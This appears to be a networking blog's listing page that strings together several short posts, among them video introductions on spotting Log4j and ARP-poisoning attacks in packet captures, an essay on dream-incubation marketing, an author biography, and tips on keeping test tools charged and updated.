Unless we have been under a rock for the past few weeks, or on a distant island with no internet connectivity, we have been actively dealing with the most impactful zero-day vulnerability discovered this year.
In this video, we will look at how we can use packet capture and analysis to identify and filter for a Log4j attack. We break down how the attacker uses the HTTP User-Agent field to attempt to plant a reverse-callback shell script.
Download the pcap and follow along with the video!
It hit me one afternoon as I walked into our local CVS drugstore to buy mouthwash. While the automatic doors were opening before me, my phone buzzed with a text message. It was from CVS, with a link to all their current sales and coupons. As I looked around the store, my epiphany struck. My devices may be monitoring my movements for health purposes, but information on every store I visit and every purchase I make is somewhere in the cloud, waiting to be exploited.
Marketing technology extends far beyond mere locational surveillance. Back when I was a youngster going to movie theaters, word leaked out that they were placing brief pictures of hot buttered popcorn and other temptations into the trailers to stimulate a subliminal desire to visit the snack bar. Fearful of Communist propaganda being broadcast in a similar manner, the Federal Communications Commission and members of Congress summoned market researcher James Vicary to put on a demonstration. No one was convinced it worked, and Vicary later admitted he had faked his data. Nevertheless, laws were passed to guard against such practices.
More recently, theaters are much less subtle, showing lengthy commercials for food before the trailers even begin. Product placements in the films themselves are yet another way that theaters manipulate us. Going to actual theaters is becoming quaint, but that hasn’t stopped advertisers from messing with our heads.
Super Bowl is one of the biggest advertising events of the year, and companies spend up to $10 million per minute to pitch their wares to over 100 million viewers. At these stakes, there are few limits to what advertisers will do to secure a return on their investment. Coors beer brewer Molson-Coors conducted what they euphemistically called a “dream study” on the night before Super Bowl LV. On advice from a Harvard psychologist, they designed dream incubation stimuli to associate images of Coors beer with positive imagery like refreshing alpine rivers. If you rushed out Sunday morning for last minute Super Bowl party supplies and came back with a cold case of Coors beer, now you know why.
Molson-Coors isn’t the only one trying to alter our behavior. A 2021 survey of 400 marketers by the American Marketing Association New York found that 77 percent of them were planning on deploying dream incubation technology over the next three years. This focus on the commercial exploitation of dreams might seem at first glance to be the latest trend, but the idea has been around for decades.
While psychiatrist Sigmund Freud was securing a place in history with his theories of dreams and the unconscious, his lesser-known nephew Edward Bernays focused on public influence through the creation of unconscious associations and desires. The connection between cars and masculinity, cigarettes and rugged individualism or alcohol and an active social life were engineered by Edward and his disciples when we had no idea what was happening.
Sleep has been accepted as a mysterious yet powerful interlude throughout history. When I was an undergraduate, my fellow students and I would often stay up late cramming the night before an exam. Although we might have justified this by saying that we were incubating freshman chemistry into our dreams, the truth is that we had procrastinated until the last possible moment. To the best of my knowledge, there is no good data on reasonable study habits to compare this with.
There is plenty of folklore around the belief that dreams enable creativity. Musicians, writers, and painters often say they wake up from a dream with fresh inspiration for their art. In Salvador Dali’s book 50 Secrets of Magic Craftsmanship (1948), the great Spanish surrealist documented his technique for falling asleep in a chair with a key in his hand suspended over a plate. He would drift off while thinking about a problem he was trying to solve, and when his hand relaxed the key would fall onto the plate and awaken him, often with the solution he was seeking.
We have come a long way since the key-and-plate contraption, and the tools of modern science have allowed us to explore the effects of external stimuli on brain waves and eye movements in fine detail. We know now that people are very vulnerable to suggestion when in certain stages of sleep, and we are getting better at detecting those stages by listening to the sounds of breathing and body movements. A well-timed proposal could influence our dreams and behaviors without us ever suspecting. A simple smart speaker could do the trick, and today over 40 million of us have one in our bedroom.
Sweet dreams.
Author Profile - Paul W. Smith - leader, educator, technologist, writer - has a lifelong interest in the countless ways that technology changes the course of our journey through life. In addition to being a regular contributor to NetworkDataPedia, he maintains the website Technology for the Journey and occasionally writes for Blogcritics. Paul has over 40 years of experience in research and advanced development for companies ranging from small startups to industry leaders. His other passion is teaching - he is a former Adjunct Professor of Mechanical Engineering at the Colorado School of Mines. Paul holds a doctorate in Applied Mechanics from the California Institute of Technology, as well as Bachelor’s and Master’s Degrees in Mechanical Engineering from the University of California, Santa Barbara.
The scenario plays out pretty well the same way… Working with a client and they go get a ‘tool’ to troubleshoot something with me.
They retrieve the tool and realize that the person who purchased and used it the most no longer works there. No problem, I know how to use it.
First issue; battery is dead. No worries, lets plug it in while we get organized. I suggest that if the batteries for your tools have removable batteries, remove them when storing the tool. Depending on the design of the tool and case, the power button might get pressed. In other scenarios, I’ve seen the tool, left powered on and put back in the case.
Great, the charger isn’t in the case. So now the power adapter easter egg hunt commences. An obvious tip, keep the power adapter with the unit. We did find it in another case. Apparently, one of the adapters got lost so they were reusing this one with multiple tools.
Now that the device is charging, let's check the version of the software to ensure its up to date. This requires us to log in to the vendor's website. Of course, no one knows the login information because the fellow who left was responsible for the tool. A quick password recovery effort and we’re ready to go.
That’s where this video comes in. I thought it would be helpful to document how to update the NetAlly LinkRunner G2’s software since some tools have a different procedure.
On a scale of 1 to 10 I would say that the NetAlly upgrade process was a solid 9. The only criticism I would provide is that it would be helpful if the tool simply notified the user that a current version is available so you don’t have to manually check.
If you are interested in more info, contact https://netally.com
In this video we take a peek at how an ARP Poison attack really works. Instead of just downloading a tool like Ettercap and hitting "Go", we want to know what really happens under the hood. This way we can quickly spot ARP Poison behavior if we are ever the target of a man-in-the-middle.
In a future video, we will look at how to set pre-saved filters in Wireshark to quickly spot this behavior.
One of the common questions I get asked is “What tools do you take on a job?”.
Trying not so sound like an infomercial or typical consultant 😉, I always start with the same response, “depends what you’re doing”.
Troubleshooting, design, installation and training obviously have their differences. Even if I zero in on the most obvious category of troubleshooting, there are still many variables to consider. This is best illustrated with examples.
When troubleshooting performance problems for a client/network that I am familiar with, I usually bring a tap, packet capture tool and my paper notebook. But if I was working on an unfamiliar network, I might want to bring a network discovery tool or software.
This is where my video comes in. Here I recommend to bring the appropriate cables as well as a good old USB flash drive. Since they are inexpensive, I’m in the habit of leaving them in my various tool bags.
The other pro to using the USB drives is that you can use it in Windows, Linux, Apple, Android and other operating systems. I also carry around USB extension cable and microusb/usb adapter in case want to copy data from the USB drive to my phone.
While typing this out, I realized that I missed something; tool bags or cases.
When I use any tool, the first thing is check out the bag or case that it came in since you usually put cables, adapters and other related stuff with the tool.
It drives me crazy when a vendor provides a case that is a real tight fit for its tool that you cant even get the tool back into, let alone space for your cables, adapters or other items you might need for your job. Sometimes I find myself reusing bags from larger tools for smaller tools, or have some larger bags that I keep specific stuff in.
I encourage you to build your own tool bag and let me know what you put in yours.
